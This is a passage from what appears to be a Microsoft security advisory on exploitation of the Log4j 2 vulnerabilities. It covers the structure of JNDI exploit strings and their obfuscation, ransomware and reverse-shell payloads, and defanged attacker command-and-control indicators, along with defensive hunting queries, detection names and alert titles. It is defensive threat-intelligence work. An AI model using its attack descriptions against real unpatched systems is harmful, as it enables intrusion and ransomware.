observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers. An example pattern of attack would appear in a web request log with strings like the following:\n\n\n\nAn attacker performs an HTTP request against a target system, which generates a log using Log4j 2 that leverages JNDI to perform a request to the attacker-controlled site. The vulnerability then causes the exploited process to reach out to the site and execute the payload. In many observed attacks, the attacker-owned parameter is a DNS logging system, intended to log a request to the site to fingerprint the vulnerable systems.\n\nThe specially crafted string that enables exploitation of the vulnerabilities can be identified through several components. The string contains \u201cjndi\u201d, which refers to the Java Naming and Directory Interface. Following this, the protocol, such as \u201cldap\u201d, \u201cldaps\u201d, \u201crmi\u201d, \u201cdns\u201d, \u201ciiop\u201d, or \u201chttp\u201d, precedes the attacker domain.\n\nAs security teams work to detect the exploitation, attackers have added obfuscation to these requests to evade detections based on request patterns. We\u2019ve seen things like running a lower or upper command within the exploitation string and even more complicated obfuscation attempts, such as the following, that are all trying to bypass string-matching detections:\n\n\n\nThe vast majority of observed activity has been scanning, but exploitation and post-exploitation activities have also been observed. Based on the nature of the vulnerabilities, once the attacker has full access and control of an application, they can perform a myriad of objectives. Microsoft has observed activities including installing coin miners, using Cobalt Strike to enable credential theft and lateral movement, and exfiltrating data from compromised systems.\n\n### Exploitation continues on non-Microsoft hosted Minecraft servers\n\nMinecraft customers running their own servers are encouraged to deploy the latest Minecraft server update as soon as possible to protect their users. More information can be found here: <https://aka.ms/mclog>.\n\nMicrosoft can confirm public reports of the Khonsari ransomware family being delivered as payload post-exploitation, as discussed by [Bitdefender](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). In Microsoft Defender Antivirus data we have observed a small number of cases of this being launched from compromised Minecraft clients connected to modified Minecraft servers running a vulnerable version of Log4j 2 via the use of a third-party Minecraft mods loader.\n\nIn these cases, an adversary sends a malicious in-game message to a vulnerable Minecraft server, which exploits CVE-2021-44228 to retrieve and execute an attacker-hosted payload on both the server and on connected vulnerable clients. We observed exploitation leading to a malicious Java class file that is the Khonsari ransomware, which is then executed in the context of _javaw.exe_ to ransom the device.\n\nWhile it\u2019s uncommon for Minecraft to be installed in enterprise networks, we have also observed PowerShell-based reverse shells being dropped to Minecraft client systems via the same malicious message technique, giving an actor full access to a compromised system, which they then use to run Mimikatz to steal credentials. These techniques are typically associated with enterprise compromises with the intent of lateral movement. Microsoft has not observed any follow-on activity from this campaign at this time, indicating that the attacker may be gathering access for later use.\n\nDue to the shifts in the threat landscape, Microsoft reiterates the guidance for Minecraft customers running their own servers to deploy the latest Minecraft server update and for players to exercise caution by only connecting to trusted Minecraft servers.\n\n### Nation-state activity\n\nMSTIC has also observed the CVE-2021-44228 vulnerability being used by multiple tracked nation-state activity groups originating from China, Iran, North Korea, and Turkey. This activity ranges from experimentation during development, integration of the vulnerabilities to in-the-wild payload deployment, and exploitation against targets to achieve the actor\u2019s objectives.\n\nFor example, MSTIC has observed PHOSPHORUS, an Iranian actor known to deploy ransomware, acquiring and making modifications of the Log4j exploit. We assess that PHOSPHORUS has operationalized these modifications.\n\nIn addition, HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.\n\n### Access brokers associated with ransomware\n\nMSTIC and the Microsoft 365 Defender team have confirmed that multiple tracked activity groups acting as access brokers have begun using the vulnerability to gain initial access to target networks. These access brokers then sell access to these networks to ransomware-as-a-service affiliates. We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms.\n\n### Mass scanning activity continues\n\nThe vast majority of traffic observed by Microsoft remains mass scanners by both attackers and security researchers. Microsoft has observed rapid uptake of the vulnerability into existing botnets like Mirai, existing campaigns previously targeting vulnerable Elasticsearch systems to deploy cryptocurrency miners, and activity deploying the Tsunami backdoor to Linux systems. Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows.\n\nMicrosoft has also continued to observe malicious activity performing data leakage via the vulnerability without dropping a payload. This attack scenario could be especially impactful against network devices that have SSL termination, where the actor could leak secrets and data.\n\n### Additional RAT payloads\n\nWe\u2019ve observed the dropping of additional remote access toolkits and reverse shells via exploitation of CVE-2021-44228, which actors then use for hands-on-keyboard attacks. In addition to the Cobalt Strike and PowerShell reverse shells seen in earlier reports, we\u2019ve also seen Meterpreter, Bladabindi, and HabitsRAT. Follow-on activities from these shells have not been observed at this time, but these tools have the ability to steal passwords and move laterally.\n\nThis activity is split between a percentage of small-scale campaigns that may be more targeted or related to testing, and the addition of CVE-2021-44428 to existing campaigns that were exploiting vulnerabilities to drop remote access tools. In the HabitsRAT case, the campaign was seen overlapping with infrastructure used in prior campaigns.\n\n### Webtoos\n\nThe Webtoos malware has DDoS capabilities and persistence mechanisms that could allow an attacker to perform additional activities. As reported by [RiskIQ](<https://community.riskiq.com/article/67ba1386>), Microsoft has seen Webtoos being deployed via the vulnerability. Attackers\u2019 use of this malware or intent is not known at this time, but the campaign and infrastructure have been in use and have been targeting both Linux and Windows systems prior to this vulnerability.\n\n### A note on testing services and assumed benign activity\n\nWhile services such as _interact.sh_, _canarytokens.org_, _burpsuite_, and _dnslog.cn_ may be used by IT organizations to profile their own threat footprints, Microsoft encourages including these services in your hunting queries and validating observations of these in environments to ensure they are intentional and legitimate activity.\n\n### Exploitation in internet-facing systems leads to ransomware\n\nAs early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware.\n\nThese attacks are performed by a China-based ransomware operator that we\u2019re tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).\n\nBased on our analysis, the attackers are using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.\n\n### Attackers propagating Log4j attacks via previously undisclosed vulnerability\n\nDuring our sustained monitoring of threats taking advantage of the Log4j 2 vulnerabilities, we observed activity related to attacks being propagated via a previously undisclosed vulnerability in the SolarWinds Serv-U software. We discovered that the vulnerability, now tracked as [CVE-2021-35247](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35247>), is an input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation.\n\nWe reported our discovery to SolarWinds, and we\u2019d like to thank their teams for immediately investigating and working to remediate the vulnerability. We strongly recommend affected customers to apply security updates released by referring to the SolarWinds advisory here: <https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>. \n\nMicrosoft customers can use threat and vulnerability management in Microsoft Defender for Endpoint to identify and remediate devices that have this vulnerability. In addition, Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect malicious behavior related to the observed activity.\n\n## Finding and remediating vulnerable apps and systems\n\n### Threat and vulnerability management\n\n[Threat and vulnerability management](<https://www.microsoft.com/security/business/threat-protection/threat-vulnerability-management>) capabilities in Microsoft Defender for Endpoint monitor an organization\u2019s overall security posture and equip customers with real-time insights into organizational risk through continuous vulnerability discovery, intelligent prioritization, and the ability to seamlessly remediate vulnerabilities.\n\n#### Discovering affected components, software, and devices via a unified Log4j dashboard\n\nThreat and vulnerability management automatically and seamlessly identifies devices affected by the Log4j vulnerabilities and the associated risk in the environment and significantly reduces time-to-mitigate.\n\nThe wide use of Log4j across many supplier\u2019s products challenge defender teams to mitigate and address the risks posed by the vulnerabilities ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) or [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>)). The threat and vulnerability management capabilities within Microsoft 365 Defender can help identify vulnerable installations. On December 15, we began rolling out updates to provide a consolidated view of the organizational exposure to the Log4j 2 vulnerabilities\u2014on the device, software, and vulnerable component level\u2014through a range of automated, complementing capabilities. These capabilities are supported on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. They are also supported on Linux, but they require updating the Microsoft Defender for Endpoint Linux client to version 101.52.57 (30.121092.15257.0) or later. The updates include the following:\n\n * Discovery of vulnerable Log4j library components (paths) on devices\n * Discovery of vulnerable installed applications that contain the Log4j library on devices\n * A [dedicated Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>) that provides a consolidated view of various findings across vulnerable devices, vulnerable software, and vulnerable files\n * Introduction of a new schema in advanced hunting, **DeviceTvmSoftwareEvidenceBeta**, which surfaces file-level findings from the disk and provides the ability to correlate them with additional context in advanced hunting:\n \n \n DeviceTvmSoftwareEvidenceBeta\n | mv-expand DiskPaths\n | where DiskPaths contains \"log4j\"\n | project DeviceId, SoftwareName, SoftwareVendor, SoftwareVersion, DiskPaths\n\nTo complement this new table, the existing **DeviceTvmSoftwareVulnerabilities** table in advanced hunting can be used to identify vulnerabilities in installed software on devices:\n \n \n DeviceTvmSoftwareVulnerabilities \n | where CveId in (\"CVE-2021-44228\", \"CVE-2021-45046\")\n\nThese new capabilities integrate with the existing threat and vulnerability management experience and are gradually rolling out. As of December 27, 2021, discovery is based on installed application CPEs that are known to be vulnerable to Log4j RCE, as well as the presence of vulnerable Log4j Java Archive (JAR) files. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but support for discovery of these instances and other packaging methods is in development. Support for macOS is also in progress and will roll out soon.\n\n\n\n_Figure 1. Threat and Vulnerability recommendation __\u201cAttention required: Devices found with vulnerable Apache Log4j versions\u201d_\n\nOn the Microsoft 365 Defender portal, go to **Vulnerability management** &gt; **Dashboard** &gt; **Threat awareness**, then click **View vulnerability details** to see the consolidated view of organizational exposure to the Log4j 2 vulnerability (for example, CVE-2021-44228 dashboard, as shown in the following screenshots) on the device, software, and vulnerable component level.\n\n\n\n_Figure 2. Threat and vulnerability management dedicated CVE-2021-44228 dashboard_\n\n\n\n_Figure 3. Threat and vulnerability management finds exposed paths_\n\n\n\n_Figure 4. Threat and vulnerability management finds exposed devices based on vulnerable software and vulnerable files detected on disk_\n\nNote: Scan results may take some time to reach full coverage, and the number of discovered devices may be low at first but will grow as the scan reaches more devices. A regularly updated list of vulnerable products can be viewed in the Microsoft 365 Defender portal with matching recommendations. We will continue to review and update this list as new information becomes available.\n\nThrough [device discovery](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/unmanaged-device-protection-capabilities-are-now-generally/ba-p/2463796>), unmanaged devices with products and services affected by the vulnerabilities are also surfaced so they can be onboarded and secured.\n\n\n\n_Figure 5. Finding vulnerable applications and devices via software inventory_\n\n#### Applying mitigation directly in the Microsoft 365 Defender portal\n\nWe have released two new threat and vulnerability management capabilities that can significantly simplify the process of turning off JNDI lookup, a workaround that can prevent the exploitation of the Log4j vulnerabilities on most devices, using an environment variable called LOG4J_FORMAT_MSG_NO_LOOKUPS. These new capabilities provide security teams with the following:\n\n 1. View the mitigation status for each affected device. This can help prioritize mitigation and/or patching of devices based on their mitigation status.\n\nTo use this feature, open the [Exposed devices tab](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/exposedDevices>) in the dedicated CVE-2021-44228 dashboard and review the **Mitigation status** column. Note that it may take a few hours for the updated mitigation status of a device to be reflected.\n\n\n\n_Figure 6. Viewing each device\u2019s mitigation status_\n\n 2. Apply the mitigation (that is, turn off JNDI lookup) on devices directly from the portal. This feature is currently available for Windows devices only.\n\nThe mitigation will be applied directly via the Microsoft Defender for Endpoint client. To view the mitigation options, click on the **Mitigation options** button in the [Log4j dashboard](<https://security.microsoft.com/vulnerabilities/vulnerability/CVE-2021-44228/overview>):\n\n\n\nYou can choose to apply the mitigation to all exposed devices or select specific devices for which you would like to apply it. To complete the process and apply the mitigation on devices, click **Create mitigation action**.\n\n\n\n_Figure 7. Creating mitigation actions for exposed devices._\n\nIn cases where the mitigation needs to be reverted, follow these steps:\n\n 1. Open an elevated PowerShell window\n 2. Run the following command:\n \n \n [Environment]::SetEnvironmentVariable(\"LOG4J_FORMAT_MSG_NO_LOOKUPS\", $null, [EnvironmentVariableTarget]::Machine)\n\nThe change will take effect after the device restarts.\n\n### Microsoft 365 Defender advanced hunting\n\nAdvance hunting can also surface affected software. This query looks for possibly vulnerable applications using the affected Log4j component. Triage the results to determine applications and programs that may need to be patched and updated.\n \n \n DeviceTvmSoftwareInventory\n | where SoftwareName contains \"log4j\"\n | project DeviceName, SoftwareName, SoftwareVersion\n\n\n\n_Figure 8. Finding vulnerable software via advanced hunting_\n\n### Microsoft Defender for Cloud\n\n#### Microsoft Defender for servers\n\nOrganizations using Microsoft Defender for Cloud can use [Inventory tools](<https://docs.microsoft.com/azure/defender-for-cloud/asset-inventory>) to begin investigations before there\u2019s a CVE number. With Inventory tools, there are two ways to determine exposure across hybrid and multi-cloud resources:\n\n * Vulnerability assessment findings \u2013 Organizations who have enabled any of the vulnerability assessment tools (whether it&#x27;s Microsoft Defender for Endpoint&#x27;s [threat and vulnerability management](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-tvm>) module, the [built-in Qualys scanner](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-vm>), or a [bring your own license solution](<https://docs.microsoft.com/azure/defender-for-cloud/deploy-vulnerability-assessment-byol-vm>)), they can search by CVE identifier:\n\n\n\n_Figure 9. Searching vulnerability assessment findings by CVE identifier_\n\n * Software inventory - With the combined [integration with Microsoft Defender for Endpoint](<https://docs.microsoft.com/azure/defender-for-cloud/integration-defender-for-endpoint>) and [Microsoft Defender for servers](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-servers-introduction>), organizations can search for resources by installed applications and discover resources running the vulnerable software:\n\n\n\n_Figure 10. Searching software inventory by installed applications_\n\nNote that this doesn\u2019t replace a search of your codebase. It\u2019s possible that software with integrated Log4j libraries won\u2019t appear in this list, but this is helpful in the initial triage of investigations related to this incident. For more information about how Microsoft Defender for Cloud finds machines affected by CVE-2021-44228, read this [tech community post](<https://techcommunity.microsoft.com/t5/microsoft-defender-for-cloud/how-defender-for-cloud-finds-machines-affected-by-log4j/ba-p/3037271>).\n\n#### Microsoft Defender for Containers\n\nMicrosoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: [CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>), [CVE-2021-45046](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>), and [CVE-2021-45105](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105>). Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster. Additional information on supported scan triggers and Kubernetes clusters can be found [here](<https://docs.microsoft.com/azure/defender-for-cloud/defender-for-containers-introduction?tabs=defender-for-container-arch-aks>). \n\nLog4j binaries are discovered whether they are deployed via a package manager, copied to the image as stand-alone binaries, or included within a JAR Archive (up to one level of nesting). \n\nWe will continue to follow up on any additional developments and will update our detection capabilities if any additional vulnerabilities are reported.\n\n**Finding affected images**\n\nTo find vulnerable images across registries using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Container Registry images should have vulnerability findings resolved** recommendation and search findings for the relevant CVEs. \n\n\n\n_Figure 11. Finding images with the CVE-2021-45046 vulnerability_ \n\n**Find vulnerable running images on Azure portal [preview] **\n\nTo view only vulnerable images that are currently running on a Kubernetes cluster using the Azure portal, navigate to the **Microsoft Defender for Cloud** service under Azure Portal. Open the **Vulnerabilities in running container images should be remediated (powered by Qualys)** recommendation and search findings for the relevant CVEs: \n\n\n\n_Figure 12. Finding running images with the CVE-2021-45046 vulnerability _\n\nNote: This recommendation requires clusters to run Microsoft Defender security profile to provide visibility on running images.\n\n**Search Azure Resource Graph data ******\n\nAzure Resource Graph (ARG) provides instant access to resource information across cloud environments with robust filtering, grouping, and sorting capabilities. It&#x27;s a quick and efficient way to query information across Azure subscriptions programmatically or from within the Azure portal. ARG provides another way to query resource data for resources found to be affected by the Log4j vulnerability.\n\nThe following query finds resources affected by the Log4j vulnerability across subscriptions. Use the additional data field across all returned results to obtain details on vulnerable resources: \n \n \n securityresources \n | where type =~ \"microsoft.security/assessments/subassessments\"\n | extend assessmentKey=extract(@\"(?i)providers/Microsoft.Security/assessments/([^/]*)\", 1, id), subAssessmentId=tostring(properties.id), parentResourceId= extract(\"(.+)/providers/Microsoft.Security\", 1, id)\n | extend Props = parse_json(properties)\n | extend additionalData = Props.additionalData\n | extend cves = additionalData.cve\n | where isnotempty(cves) and array_length(cves) > 0\n | mv-expand cves\n | where tostring(cves) has \"CVE-2021-44228\" or tostring(cves) has \"CVE-2021-45046\" or tostring(cves) has \"CVE-2021-45105\" \n\n### Microsoft Sentinel queries\n\nMicrosoft Sentinel customers can use the following detection query to look for devices that have applications with the vulnerability:\n\n * [Vulnerable machines related to Log4j CVE-2021-44228](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityNestedRecommendation/Log4jVulnerableMachines.yaml>)\n\nThis query uses the Microsoft Defender for Cloud nested recommendations data to find machines vulnerable to Log4j CVE-2021-44228.\n\nMicrosoft Sentinel also provides a CVE-2021-44228 Log4Shell Research Lab Environment for testing the vulnerability: <https://github.com/OTRF/Microsoft-Sentinel2Go/tree/master/grocery-list/Linux/demos/CVE-2021-44228-Log4Shell>\n\n### RiskIQ EASM and Threat Intelligence\n\nRiskIQ has published a few threat intelligence articles on this CVE, with mitigation guidance and IOCs. The latest one with links to previous articles can be found [here](<https://community.riskiq.com/article/67ba1386>). Both Community users and enterprise customers can search within the threat intelligence portal for data about potentially vulnerable components exposed to the Internet. For example, it&#x27;s possible to [surface all observed instances of Apache](<https://community.riskiq.com/search/components?category=Server&query=Apache>) or [Java](<https://community.riskiq.com/research?query=java>), including specific versions. Leverage this method of exploration to aid in understanding the larger Internet exposure, while also filtering down to what may impact you. \n\nFor a more automated method, registered users can view their attack surface to understand tailored findings associated with their organization. Note, you must be registered with a corporate email and the automated attack surface will be limited. Digital Footprint customers can immediately understand what may be vulnerable and act swiftly and resolutely using the [Attack Surface Intelligence Dashboard](<https://app.riskiq.net/a/main/index#/dashboards/379/RiskIQ%20Attack%20Intelligence%20Dashboard>) Log4J Insights tab. \n\n## Detecting and responding to exploitation attempts and other related attacker activity\n\n### Microsoft 365 Defender\n\nMicrosoft 365 Defender coordinates multiple security solutions that detect components of observed attacks taking advantage of this vulnerability, from exploitation attempts to remote code execution and post-exploitation activity.\n\n\n\n_Figure 13. Microsoft 365 Defender solutions protect against related threats_\n\nCustomers can click **Need help?** in the Microsoft 365 Defender portal to open up a search widget. Customers can key in \u201cLog4j\u201d to search for in-portal resource, check if their network is affected, and work on corresponding actionable items to mitigate them.\n\n#### Microsoft Defender Antivirus\n\nTurn on cloud-delivered protection in Microsoft Defender Antivirus to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block the majority of new and unknown variants. Microsoft Defender Antivirus detects components and behaviors related to this threat as the following detection names:\n\nOn Windows:\n\n * [Trojan:Win32/Capfetox.AA](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Capfetox.AA&threatId=-2147159827>)- detects attempted exploitation on the attacker machine\n * [HackTool:Win32/Capfetox.A!dha](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=HackTool:Win32/Capfetox.A!dha&threatId=-2147159807>) - detects attempted exploitation on the attacker machine\n * [VirTool:Win64/CobaltSrike.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=VirTool:Win64/CobaltStrike.A&threatId=-2147200161>), [TrojanDropper:PowerShell/Cobacis.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDropper:PowerShell/Cobacis.A&threatId=-2147200375>) - detects Cobalt Strike Beacon loaders\n * [TrojanDownloader:Win32/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Win32/CoinMiner&threatId=-2147257370>) - detects post-exploitation coin miner\n * [Trojan:Win32/WebToos.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/WebToos.A&threatId=-2147278986>) - detects post-exploitation PowerShell\n * [Ransom:MSIL/Khonsari.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:MSIL/Khonsari.A&threatId=-2147159485>) - detects a strain of the Khonsari ransomware family observed being distributed post-exploitation\n * [Trojan:Win64/DisguisedXMRigMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win64/DisguisedXMRigMiner&threatId=-2147169351>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Java/Agent.S](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Java/Agent.S&threatId=-2147159796>) - detects suspicious class files used in post-exploitation\n * [TrojanDownloader:PowerShell/NitSky.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:PowerShell/NitSky.A&threatId=-2147157401>) - detects attempts to download CobaltStrike Beacon payload\n\nOn Linux:\n\n * [Trojan:Linux/SuspectJavaExploit.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.A&threatId=-2147159829>), [Trojan:Linux/SuspectJavaExploit.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.B&threatId=-2147159828>), [Trojan:Linux/SuspectJavaExploit.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/SuspectJavaExploit.C&threatId=-2147159808>) - blocks Java processes downloading and executing payload through output redirection\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/CoinMiner](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/CoinMiner&threatId=-2147241315>) - detects post-exploitation cryptocurrency miner\n * [TrojanDownloader:Linux/Tusnami](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Tusnami.A&threatId=-2147159794>) - detects post-exploitation Backdoor Tsunami downloader\n * [Backdoor:Linux/Tusnami.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Tusnami.C!MTB&threatId=-2147178887>) - detects post-exploitation Tsunami backdoor\n * [Backdoor:Linux/Setag.C](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Setag.C&threatId=-2147277056>) - detects post-exploitation Gates backdoor\n * [Exploit:Linux/CVE-2021-44228.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.A&threatId=-2147159804>), [Exploit:Linux/CVE-2021-44228.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit:Linux/CVE-2021-44228.B&threatId=-2147159803>) - detects exploitation\n * [TrojanDownloader:Linux/Capfetox.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.A&threatId=-2147159639>), [TrojanDownloader:Linux/Capfetox.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/Capfetox.B&threatId=-2147159640>)\n * [TrojanDownloader:Linux/ShAgnt!MSR](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt!MSR&threatId=-2147159432>), [TrojanDownloader:Linux/ShAgnt.A!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=TrojanDownloader:Linux/ShAgnt.A!MTB&threatId=-2147159607>)\n * [Trojan:Linux/Kinsing.L](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Kinsing.L&threatId=-2147189973>) - detects post-exploitation cryptocurrency Kinsing miner\n * [Trojan:Linux/Mirai.TS!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/Mirai.TS!MTB&threatId=-2147159629>) - detects post-exploitation Mirai malware capable of performing DDoS\n * [Backdoor:Linux/Dakkatoni.az!MTB](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Linux/Dakkatoni.az!MTB&threatId=-2147205141>) - detects post-exploitation Dakkatoni backdoor trojan capable of downloading more payloads\n * [Trojan:Linux/JavaExploitRevShell.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/JavaExploitRevShell.A&threatId=-2147159631>) - detects reverse shell attack post-exploitation\n * [Trojan:Linux/BashMiner.A](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.A&threatId=-2147159832>), [Trojan:Linux/BashMiner.B](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Linux/BashMiner.B&threatId=-2147159820>) - detects post-exploitation cryptocurrency miner\n\n#### Microsoft Defender for Endpoint\n\nUsers of Microsoft Defender for Endpoint can turn on the following attack surface reduction rule to block or audit some observed activity associated with this threat.\n\n * Block executable files from running unless they meet a prevalence, age, or trusted list criterion\n\nDue to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.\n\nAlerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms: \n\n * **Log4j exploitation detected** \u2013 detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability\n * **Log4j exploitation artifacts detected** (previously titled Possible exploitation of CVE-2021-44228) \u2013 detects coin miners, shells, backdoor, and payloads such as Cobalt Strike used by attackers post-exploitation\n * **Log4j exploitation network artifacts detected** (previously titled Network connection seen in CVE-2021-44228 exploitation) - detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity \n\nThe following alerts may indicate exploitation attempts or testing/scanning activity. Microsoft advises customers to investigate with caution, as these alerts don\u2019t necessarily indicate successful exploitation:\n\n * **Possible target of Log4j exploitation - **detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __received by__ this device\n * **Possible target of Log4j vulnerability scanning** \u2013 detects a possible __attempt to scan__ for the remote code execution vulnerability in a Log4j component of an Apache server in communication received by this device\n * **Possible source of Log4j exploitation** \u2013 detects a possible attempt to exploit the remote code execution vulnerability in the Log4j component of an Apache server in communication __initiated from__ this device \n * **Possible Log4j exploitation** - detects multiple behaviors, including suspicious command launch post-exploitation\n * **Possible Log4j exploitation (CVE-2021-44228)** \u2013 inactive, initially covered several of the above, now replaced with more specific titles\n\nThe following alerts detect activities that have been observed in attacks that utilize at least one of the Log4j vulnerabilities. However, these alerts can also indicate activity that is not related to the vulnerability. We are listing them here, as it is highly recommended that they are triaged and remediated immediately given their severity and the potential that they could be related to Log4j exploitation:\n\n * Suspicious remote PowerShell execution \n * Download of file associated with digital currency mining \n * Process associated with digital currency mining \n * Cobalt Strike command and control detected \n * Suspicious network traffic connection to C2 Server \n * Ongoing hands-on-keyboard attacker activity detected (Cobalt Strike) \n\nSome of the alerts mentioned above utilize the enhanced network inspection capabilities in Microsoft Defender for Endpoint. These alerts correlate several network and endpoint signals into high-confidence detection of successful exploitation, as well as providing detailed evidence artifacts valuable for triage and investigation of detected activities.\n\n\n\n_Figure 14. Example detection leveraging network inspection provides details about the Java class returned following successful exploitation_\n\n#### Microsoft Defender for Cloud Apps (previously Microsoft Cloud App Security)\n\nMicrosoft 365 Defender detects exploitation patterns in different data sources, including cloud application traffic reported by Microsoft Defender for Cloud Apps. The following alert surfaces exploitation attempts via cloud applications that use vulnerable Log4j components:\n\n * Log4j exploitation attempt via cloud application (previously titled Exploitation attempt against Log4j (CVE-2021-44228))\n\n\n\n_Figure 15. Microsoft 365 Defender alert &quot;Exploitation attempt against Log4j (CVE-2021-4428)&quot;_\n\n#### Microsoft Defender for Office 365\n\nTo add a layer of protection against exploits that may be delivered via email, Microsoft Defender for Office 365 flags suspicious emails (e.g., emails with the \u201cjndi\u201d string in email headers or the sender email address field), which are moved to the Junk folder.\n\nWe also added the following new alert, which detects attempts to exploit CVE-2021-44228 through email headers:\n\n * Log4j exploitation attempt via email (previously titled Log4j Exploitation Attempt \u2013 Email Headers (CVE-2021-44228))\n\n\n\n_Figure 16. __Sample alert on malicious sender display name found in email correspondence_\n\nThis detection looks for exploitation attempts in email headers, such as the sender display name, sender, and recipient addresses. The alert covers known obfuscation attempts that have been observed in the wild. If this alert is surfaced, customers are recommended to evaluate the source address, email subject, and file attachments to get more context regarding the authenticity of the email.\n\n\n\n_Figure 17. Sample email with malicious sender display name_\n\nIn addition, this email event as can be surfaced 